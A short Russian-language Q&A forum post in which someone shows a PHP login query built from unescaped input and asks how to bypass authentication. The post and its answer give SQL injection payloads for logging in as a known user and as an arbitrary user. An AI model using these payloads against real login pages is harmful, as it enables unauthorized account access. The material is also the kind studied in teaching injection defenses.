Обход аутентификации на сайте

У меня есть часть очень простого кода страницы входа в систему, написанного на php, который я хочу обойти без какой-либо регистрации.

 $req="select id from USERS where login='$login' and pwd='$pass'";
$result = mysql_query($req);

Если у меня есть логин пользователя, например, login1, который уже находится в базе данных. Мне просто нужно ввести следующие записи, чтобы войти без знания его пароля; что мы называем SQL-инъекцией:

 login="login1"password="' OR '1'='1'"

Тем не менее, я не знаю, как мы можем войти на страницу без логина или пароля.

Заранее спасибо !

-1

Решение

Работает с login="' OR true ORDER BY RAND() LIMIT 1 /*"

0

Другие решения

Других решений пока нет …

По вопросам рекламы [email protected]